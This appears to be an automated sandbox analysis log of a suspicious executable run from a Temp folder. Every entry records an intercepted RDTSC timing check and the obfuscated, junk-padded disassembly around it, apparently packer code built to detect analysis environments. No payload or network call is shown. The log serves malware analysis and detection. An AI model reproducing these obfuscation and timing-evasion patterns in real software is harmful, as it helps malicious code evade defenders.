Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9465E second address: C946D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F58F53CD386h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d sub cl, FFFFFFACh 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F58F53CD388h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esi, 20CAB300h 0x00000032 push 00000000h 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F58F53CD388h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov dx, si 0x00000053 cmc 0x00000054 push 8901C812h 0x00000059 js 00007F58F53CD394h 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C946D0 second address: C9470B instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4901C812h 0x00000011 mov edi, 04D91295h 0x00000016 lea ebx, dword ptr [ebp+12455320h] 0x0000001c adc di, EF02h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F58F4C28983h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94710 second address: C94721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F58F4C2897Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CA5264 second address: CA528A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F4C2897Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F4C2897Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F18 second address: C84F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD399h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F37 second address: C84F41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F58F4C28976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB326C second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F58F53CD386h 0x00000011 jl 00007F58F53CD386h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0457 second address: 54A047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F4C28984h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A047D second address: 54A0483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0483 second address: 54A04BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F58F4C2897Eh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F58F4C28987h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A04BF second address: 54A04C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A04C5 second address: 54A0576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F58F4C2897Ch 0x00000010 or ax, 1788h 0x00000015 jmp 00007F58F4C2897Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F58F4C28988h 0x00000021 and cx, F9E8h 0x00000026 jmp 00007F58F4C2897Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F58F4C28984h 0x00000035 jmp 00007F58F4C28985h 0x0000003a popfd 0x0000003b call 00007F58F4C28980h 0x00000040 mov ah, 5Dh 0x00000042 pop edi 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 jmp 00007F58F4C2897Ah 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F58F4C2897Dh 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0576 second address: 54A057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A057C second address: 54A05AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F58F4C2897Ah 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F58F4C28989h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05AD second address: 54A05C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05C2 second address: 54A05D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C2897Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05D2 second address: 54A05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05D6 second address: 54A05F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov edx, 71FA1710h 0x00000011 mov dh, 94h 0x00000013 popad 0x00000014 mov dword ptr [esp+24h], 00000000h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov dh, ah 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05F7 second address: 54A0650 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, 84B1h 0x0000000b popad 0x0000000c lock bts dword ptr [edi], 00000000h 0x00000011 jmp 00007F58F53CD38Ch 0x00000016 jc 00007F5967C2F1A5h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, bx 0x00000022 pushfd 0x00000023 jmp 00007F58F53CD399h 0x00000028 and cl, FFFFFFA6h 0x0000002b jmp 00007F58F53CD391h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0008 second address: 54A0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0025 second address: 54A005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F58F53CD38Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F58F53CD38Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A005A second address: 54A00CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28981h 0x00000009 or al, 00000056h 0x0000000c jmp 00007F58F4C28981h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F58F4C28980h 0x00000018 adc si, 4B78h 0x0000001d jmp 00007F58F4C2897Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007F58F4C28986h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 movsx ebx, si 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A00CB second address: 54A00DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD390h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A00DF second address: 54A01F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F58F4C28984h 0x00000013 sbb ecx, 68E32A98h 0x00000019 jmp 00007F58F4C2897Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F58F4C28988h 0x00000025 and ah, FFFFFFF8h 0x00000028 jmp 00007F58F4C2897Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F58F4C28989h 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F58F4C2897Ch 0x0000003d jmp 00007F58F4C28985h 0x00000042 popfd 0x00000043 movzx esi, bx 0x00000046 popad 0x00000047 push esi 0x00000048 jmp 00007F58F4C28988h 0x0000004d mov dword ptr [esp], esi 0x00000050 pushad 0x00000051 movzx ecx, bx 0x00000054 pushfd 0x00000055 jmp 00007F58F4C28983h 0x0000005a xor esi, 0563B8DEh 0x00000060 jmp 00007F58F4C28989h 0x00000065 popfd 0x00000066 popad 0x00000067 mov esi, dword ptr [ebp+08h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F58F4C28988h 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A01F9 second address: 54A0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0208 second address: 54A0220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28984h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0220 second address: 54A027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F58F53CD38Ch 0x00000012 xchg eax, edi 0x00000013 jmp 00007F58F53CD390h 0x00000018 push eax 0x00000019 jmp 00007F58F53CD38Bh 0x0000001e xchg eax, edi 0x0000001f jmp 00007F58F53CD396h 0x00000024 mov eax, 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov di, CB40h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A027C second address: 54A0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0281 second address: 54A031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lock cmpxchg dword ptr [esi], ecx 0x0000000e jmp 00007F58F53CD38Ah 0x00000013 mov ecx, eax 0x00000015 jmp 00007F58F53CD390h 0x0000001a cmp ecx, 01h 0x0000001d pushad 0x0000001e movzx ecx, dx 0x00000021 pushfd 0x00000022 jmp 00007F58F53CD393h 0x00000027 sbb si, 8E7Eh 0x0000002c jmp 00007F58F53CD399h 0x00000031 popfd 0x00000032 popad 0x00000033 jne 00007F5967C2F66Eh 0x00000039 pushad 0x0000003a mov edx, ecx 0x0000003c push esi 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 popad 0x00000041 pop edi 0x00000042 jmp 00007F58F53CD390h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F58F53CD397h 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A031F second address: 54A0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28982h 0x00000009 or ecx, 0B3D5638h 0x0000000f jmp 00007F58F4C2897Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov dh, 48h 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F58F4C28986h 0x00000028 add ch, FFFFFFC8h 0x0000002b jmp 00007F58F4C2897Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F58F4C28986h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0929 second address: 54A0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F58F53CD38Bh 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov al, 33h 0x00000010 mov dh, EFh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov cl, A2h 0x00000018 push ebx 0x00000019 jmp 00007F58F53CD38Eh 0x0000001e pop ecx 0x0000001f popad 0x00000020 push FFFFFFFEh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F58F53CD393h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0971 second address: 54A0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0975 second address: 54A097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A097B second address: 54A09A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 0121h 0x00000007 movzx esi, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 470BA478h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F58F4C28985h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A09A4 second address: 54A09FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F3h 0x00000005 pushfd 0x00000006 jmp 00007F58F53CD398h 0x0000000b and eax, 0333D848h 0x00000011 jmp 00007F58F53CD38Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a add dword ptr [esp], 30D11BA0h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov di, 92B6h 0x00000028 call 00007F58F53CD397h 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A09FE second address: 54A0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 435D8B55h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F58F4C28987h 0x00000015 sbb ecx, 17352D4Eh 0x0000001b jmp 00007F58F4C28989h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28980h 0x00000027 add eax, 15AD01C8h 0x0000002d jmp 00007F58F4C2897Bh 0x00000032 popfd 0x00000033 popad 0x00000034 add dword ptr [esp], 347622ABh 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov eax, edi 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0A87 second address: 54A0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD38Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0A9A second address: 54A0AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e pushad 0x0000000f push edx 0x00000010 mov eax, 548BD6EDh 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F58F4C28983h 0x0000001c sub ah, 0000001Eh 0x0000001f jmp 00007F58F4C28989h 0x00000024 popfd 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AE9 second address: 54A0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AED second address: 54A0AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0AF3 second address: 54A0B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD391h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0B08 second address: 54A0B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0B0C second address: 54A0BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F58F53CD38Ch 0x0000000e nop 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007F58F53CD38Ch 0x00000016 pop eax 0x00000017 mov bx, A066h 0x0000001b popad 0x0000001c mov bl, 5Ch 0x0000001e popad 0x0000001f sub esp, 1Ch 0x00000022 pushad 0x00000023 mov di, ax 0x00000026 push ecx 0x00000027 pushfd 0x00000028 jmp 00007F58F53CD397h 0x0000002d sub si, CB9Eh 0x00000032 jmp 00007F58F53CD399h 0x00000037 popfd 0x00000038 pop eax 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007F58F53CD38Ah 0x00000041 mov si, F1F1h 0x00000045 popad 0x00000046 mov dword ptr [esp], ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F58F53CD399h 0x00000052 and ecx, 2501C336h 0x00000058 jmp 00007F58F53CD391h 0x0000005d popfd 0x0000005e mov edx, eax 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0BC6 second address: 54A0C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 4BBEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007F58F4C28980h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F58F4C28981h 0x00000018 sbb ah, FFFFFFF6h 0x0000001b jmp 00007F58F4C28981h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28980h 0x00000027 adc ah, 00000018h 0x0000002a jmp 00007F58F4C2897Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F58F4C28985h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C43 second address: 54A0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F58F53CD393h 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C72 second address: 54A0C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28980h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0C86 second address: 54A0D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F53CD399h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F58F53CD38Eh 0x00000017 mov eax, dword ptr [77DEB370h] 0x0000001c pushad 0x0000001d mov eax, 188DD19Dh 0x00000022 mov bx, ax 0x00000025 popad 0x00000026 xor dword ptr [ebp-08h], eax 0x00000029 jmp 00007F58F53CD394h 0x0000002e xor eax, ebp 0x00000030 pushad 0x00000031 mov di, 3572h 0x00000035 pushfd 0x00000036 jmp 00007F58F53CD393h 0x0000003b sbb ax, CB6Eh 0x00000040 jmp 00007F58F53CD399h 0x00000045 popfd 0x00000046 popad 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F58F53CD393h 0x00000051 adc al, 0000007Eh 0x00000054 jmp 00007F58F53CD399h 0x00000059 popfd 0x0000005a mov ecx, 17ABFFC7h 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D5C second address: 54A0D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D62 second address: 54A0D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0D66 second address: 54A0DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F4C28989h 0x00000011 nop 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 mov dx, C41Ch 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DA8 second address: 54A0DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
